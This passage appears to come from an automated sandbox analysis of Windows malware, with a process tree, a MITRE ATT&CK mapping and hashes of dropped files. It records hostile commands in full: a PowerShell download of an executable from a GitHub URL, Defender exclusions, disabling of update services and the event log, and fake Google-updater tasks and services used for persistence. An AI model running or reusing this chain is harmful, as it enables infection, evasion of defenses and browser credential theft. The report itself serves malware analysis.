      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2052,i,1158250117390491367,673843848831850021,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2044 /prefetch:2
      4⤵
      PID:1476
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2344,i,1158250117390491367,673843848831850021,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2352 /prefetch:13
      4⤵
      PID:4848
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,1158250117390491367,673843848831850021,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3248 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2932
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,1158250117390491367,673843848831850021,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3300 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5568
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4292,i,1158250117390491367,673843848831850021,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4312 /prefetch:9
      4⤵
      Uses browser remote debugging
      PID:5936
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4692,i,1158250117390491367,673843848831850021,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4724 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:6052
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5332,i,1158250117390491367,673843848831850021,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5344 /prefetch:14
      4⤵
      PID:960
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5520,i,1158250117390491367,673843848831850021,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5336 /prefetch:14
      4⤵
      PID:5504
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:5540
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x250,0x7ff9a3bff208,0x7ff9a3bff214,0x7ff9a3bff220
      4⤵
      PID:3192
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1708,i,4314177903971480192,12193615232096763498,262144 --variations-seed-version --mojo-platform-channel-handle=1680 /prefetch:2
      4⤵
      PID:1588
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1840,i,4314177903971480192,12193615232096763498,262144 --variations-seed-version --mojo-platform-channel-handle=2440 /prefetch:11
      4⤵
      PID:5688
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2464,i,4314177903971480192,12193615232096763498,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:13
      4⤵
      PID:3908
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,4314177903971480192,12193615232096763498,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4316
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3468,i,4314177903971480192,12193615232096763498,262144 --variations-seed-version --mojo-platform-channel-handle=3500 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4476
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\v3w4e" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2948
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 11
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\dtlquoc\mmytxipqox.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\dtlquoc\mmytxipqox.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4884
- C:\Users\Admin\AppData\Local\dtlquoc\plakgnuelnr.exe
  "C:\Users\Admin\AppData\Local\dtlquoc\plakgnuelnr.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:6104
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4616
- C:\Users\Admin\AppData\Local\dtlquoc\mmytxipqox.exe
  "C:\Users\Admin\AppData\Local\dtlquoc\mmytxipqox.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:6128
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5612
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:3596
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4124
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4796
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1956
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:4524
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2108
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1156
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:548
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1064
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4836
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
    3⤵
    - Launches sc.exe
    PID:4612
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4800
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:4744
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
    3⤵
    - Launches sc.exe
    PID:2764

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3728

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3760

C:\ProgramData\GoogleUP\Chrome\Updater.exe
C:\ProgramData\GoogleUP\Chrome\Updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4656
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:916
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3148
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5220
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2584
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4908
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:5992
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2016
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5224
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1376
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5832
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2056
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4828
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5212

C:\Users\Admin\AppData\Roaming\service.exe
C:\Users\Admin\AppData\Roaming\service.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1720
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3500
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2412

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Authentication Process

T1556

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
82fa2a1be4ab27086ddea313f3361769

SHA1
5d1ee5b9d2628843497c421ce68ee0e9ed935afb

SHA256
03ff1ed179265c4f1fcd6ba209d1f935a37bb94dc84952b315f8286edded9a40

SHA512
ac814a891f7cb79a58ef8ea7d324849efe23e79d42fe23874774964ad076b7d8225c75c8145356a940b77dd06daa9d1a1682ac3716079a0888fc60026898d272

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
78KB

MD5
8257fcabeda1e471810b7cd6ab0a6c2e

SHA1
d96bbfd060213f078126fcd3f46a673c66c8718a

SHA256
3bfaf885ac1dd9f2cd5fc77c9cf775ad473ebdfc23dc04f0930e50adf5b91b63

SHA512
7fe80ff35606fc528b7967a00f9230e7395b0a78824d3e3e0988b390258f6980d10587889afec2eb6efa4ec7a3324fb6fea21ef174d47704938af52247d255f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
0c45ee0655e29b0a935a305e66bba8cf

SHA1
ad52868d94ba826e1f0b9db56d8fb7ff1c8fff2e

SHA256
d23f3010a3dd3688741250e254dd07d508883c099e1911c3e7d0854be85ca599

SHA512
479b8d020e5f818a452c050f27488928faed74c6d329ab58befc860f5bf76878efcdd03bd0eb7b83f22afb4e74aa40c7a0d6bb29677cb4cc03ff4dbd2687bb2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\21cadfbf-a7e3-4662-88e0-29f664fa1dcc\index-dir\the-real-index

Filesize
2KB

MD5
a6eb354fbdc6c3a231284b36531246bd

SHA1
a369c7fc20ebe585c0948056735cd9844e49e5e3

SHA256
42c873c9a7a21d0e734dec088c6f51e2c9821bfe9a7b7ff17a086be284add519

SHA512
1b397082260df696538bc6d2882f2369c2cd7b1dfc6c75604ef94b654cd2e1d58684d4a4e7583aa1a7ff3df3229b02a0187b94598be507011150d50a2b16178c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\21cadfbf-a7e3-4662-88e0-29f664fa1dcc\index-dir\the-real-index~RFe57b8b1.TMP

Filesize
2KB

MD5
8e0d4f15dd8ada46366efd5007b62091

SHA1
b09e2ed6790afbe6af39e478a263b61fe9ab5555

SHA256
79951b034aeefe5bb257bef8b74488c0c61e9cf2334ca8ec381683173a678fed

SHA512
9d693c1e0b8e7cb616cde126dd90f6a42daf8fa83957c0dbf28888952475a217599756c4ad2d6e5fd269f9d43ea431a644bb494432c679eb119e7c16aff14065

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
e8ff6585abf28cee1bdc2fc0455926cc

SHA1
f72b28c4c0344ff622fd077dc43f0956480af364

SHA256
feeb7b3195427e5f36e95bd366fa639802041b4296ac412e90500ed3c2de724b

SHA512
adc47693204b2c30526716d43a2d6543fc8bbfebe118b97bb603c638aade9754f0454c7e9ccf203b8d03ed8d82ca2379affd23f7b88f5521aa9ca24ce7501423

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
da64cb77cbe428b9dd9848fd5d24bf97

SHA1
dd04290089ff03ff56add7ed019d062f066f1402

SHA256
1ec079c1fbcbde60755c5fb413660995b59db31fad1f1a0f95cbab00dee955be

SHA512
de6ff29e4023cb6e542eb9d6c075636d14928e0651e68e3c72778138b2db10a4f2658f7f9fabf45090b853bec030392e173705653c2177f0806d3ca985c801dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
34c8fb86f9d9b343c9eefc2d2c1e98ce

SHA1
cf1157a45eeabda92b095d61ecc7927cd71ee97c

SHA256
a99ad6b310c849953dd043863146f7bde5aba4d6194378647b20b59a0795d422

SHA512
33f548653e387f28f6d6d29968a0d7688f172a1e0cae47eb4949745e2a6b3924888d032f6e448d926bce1fbf305b8ef945e98ebc8ea8d339deb527d9f16d2da5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ef606a4e0c746d1d3413fcea383b8d5e

SHA1
bad44534fc65eea756975fb2b9e267d0ceec474d

SHA256
60c1be95c75a64a6ec51ac45d7ed5fb50190e5cb7e2cbe576932204a656fe883

SHA512
5b6d153dcf1552bf0072d950240dfa3fb0d3ecb844627b20715b11ff750dae0d126b6cebd6828f00679e3d35979ef5ebf2cf739331317ae67f8c7dfa79167053

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_czmoczfy.cl3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\dtlquoc\jazwjftd.exe

Filesize
137KB

MD5
9d6c51f4f9e0132ea410b8db3c241be6

SHA1
8aa67a34b626f61e6ab053f8a51e7c5142865fe4

SHA256
61d2f6f7051c9b06c87e7c6f8c596b8e4d88382278e4d34d81520bc47e2cba31

SHA512
479dd4703e0b462d7c0cfee5bdcaed97d8888f6c1fb04aad6e6d1a098b5a61701dd19a2635c64cb4cc77038445e5e498fdf8af75d728e5a58988047d3c4e2790

Download Submit
C:\Users\Admin\AppData\Local\dtlquoc\mmytxipqox.exe

Filesize
5.1MB

MD5
cb1ab881df77d5e59c9cd71a042489dd

SHA1
948c65951d6f888dacb567d9938bb21492d82097

SHA256
23fa323eea0a8a6367e810996a54337197c1750a9a0a53c306c8c4022dd94780

SHA512
84a1030a3d2f55ad6fc576bb122d98428485986c1fe4bbd41e13ac1ce588dc3f1034fbe18139f23f9422d520815b4e437b6ac7b78960d0b6c52c56acb87f9c31

Download Submit
C:\Users\Admin\AppData\Local\dtlquoc\plakgnuelnr.exe

Filesize
27KB

MD5
2ff8e057084b5c180e9b447e08d2d747

SHA1
92b35c1b8f72c18dd3e945743cb93e8531d73e2b

SHA256
accdada8772018e58baa0ecb3e79c507eb09c7d67f22f59e323c74b51eac9072

SHA512
7ae542c6ca36e5ed934ca503f3489144e0ec7d81ad246af88bb525cb494f6725df0aa9131c72afe79ff02364dd65ec7a3ffb01846f99836feff06746193af251

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
memory/1720-622-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4164-0-0x00007FF992273000-0x00007FF992275000-memory.dmp

Filesize
8KB

Download
memory/4164-9-0x0000019A6C720000-0x0000019A6C742000-memory.dmp

Filesize
136KB

Download
memory/4164-12-0x00007FF992270000-0x00007FF992D32000-memory.dmp

Filesize
10.8MB

Download
memory/4164-11-0x00007FF992270000-0x00007FF992D32000-memory.dmp

Filesize
10.8MB

Download
memory/4164-10-0x00007FF992270000-0x00007FF992D32000-memory.dmp

Filesize
10.8MB

Download
memory/4164-15-0x00007FF992270000-0x00007FF992D32000-memory.dmp

Filesize
10.8MB

Download
memory/4164-16-0x00007FF992270000-0x00007FF992D32000-memory.dmp

Filesize
10.8MB

Download
memory/4404-19-0x00007FF992270000-0x00007FF992D32000-memory.dmp

Filesize
10.8MB

Download
memory/4404-18-0x00007FF992270000-0x00007FF992D32000-memory.dmp

Filesize
10.8MB

Download
memory/4404-31-0x00007FF992270000-0x00007FF992D32000-memory.dmp

Filesize
10.8MB

Download
memory/4828-591-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4828-594-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4828-587-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4828-588-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4828-589-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4828-590-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4852-574-0x0000017AEFB80000-0x0000017AEFC33000-memory.dmp

Filesize
716KB

Download
memory/4852-582-0x0000017AEFC80000-0x0000017AEFC86000-memory.dmp

Filesize
24KB

Download
memory/4852-583-0x0000017AEFC90000-0x0000017AEFC9A000-memory.dmp

Filesize
40KB

Download
memory/4852-581-0x0000017AEFC50000-0x0000017AEFC58000-memory.dmp

Filesize
32KB

Download
memory/4852-580-0x0000017AEFCA0000-0x0000017AEFCBA000-memory.dmp

Filesize
104KB

Download
memory/4852-577-0x0000017AEFC40000-0x0000017AEFC4A000-memory.dmp

Filesize
40KB

Download
memory/4852-576-0x0000017AEFC60000-0x0000017AEFC7C000-memory.dmp

Filesize
112KB

Download
memory/4852-575-0x0000017AEFB50000-0x0000017AEFB5A000-memory.dmp

Filesize
40KB

Download
memory/4852-573-0x0000017AEFB60000-0x0000017AEFB7C000-memory.dmp

Filesize
112KB

Download
memory/4860-116-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/5212-606-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5212-598-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5212-603-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5212-605-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5212-604-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
